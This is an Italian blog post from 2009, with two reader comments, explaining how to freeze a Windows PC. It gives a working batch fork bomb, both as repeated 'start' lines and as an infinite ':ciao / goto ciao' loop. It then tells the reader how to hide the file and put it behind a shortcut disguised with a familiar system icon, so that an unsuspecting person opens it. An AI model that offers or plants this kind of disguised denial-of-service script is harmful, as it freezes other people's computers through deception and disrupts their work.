Come far impallare un pc

Pochi giorni fa un mio amico mi ha chiesto: “Come faccio a far impallare un pc?”

Per tutti gli appassionati di questa roba ecco la risposta.


Basta aprire un blocco note e ricopiare questo:


start

start

start

start

start

start

start


Di start dovete metterne tanti ma tanti di più. Più start mettete più l’effetto sarà devastante.


Poi andate su File>Salva con nome e salvatelo come start.bat scegliendo da “Salva come: “Tutti i file”.

Nella cartella dove avete salvato il file ne sarà apparso uno con una rotellina.

Se lo aprite il pc andrà in palla.

Potete provare.

 

Un altro metodo più efficace ma più difficile da ricordare è quello di scrivere invece che gli start:

:ciao
start
goto ciao

Questo crea un “segnaposto” di nome ciao che contiene l’istruzione start e l’istruzione goto, che fa tornare l’esecuzione dello script a :ciao. Si va così a creare un ciclo infinito.

 

Se volete fare una cosa di classe potete mettere il file in un qualsiasi computer in C:/ creare un collegamento sul desktop (copia>incolla collegamento), cambiare l’icona (dx>proprietà>cambia icona), in una che è molto utilizzata (es. Risorse del Computer), rinominarlo come l’icona, poi tornare in C:/ , tasto dx sul file, spuntare nascosto, premere OK e il gioco (o il finto danno) è fatto.

Come far impallare un pcultima modifica: 2009-05-17T14:14:00+02:00da itrucid
Reposta per primo quest’articolo

10 pensieri su “Come far impallare un pc

  1. mio dio … ma quindi non esiste un modo per terminare l’esecuzione del file con il pc acceso??- deve esserci un modo, poichè alla fine è come se apro infiniti processi … giusto??? solo se scrivo un clausola nel ‘file.bat’ posso terminarlo???o no??

  2. @LorenzoL’efficacia del metodo sta proprio nella difficoltà di fare qualcosa.Esistono molti metodi con cui killare molti processi, come ad esempio i filtri a disposizione per il comando taskkill (puoi imparare ad usarli digitando “taskkill /?” nel prompt, senza virgolette),tuttavia la continua apertura delle finestre e la conseguente lentezza rendono la cosa molto difficile!

Lascia un commento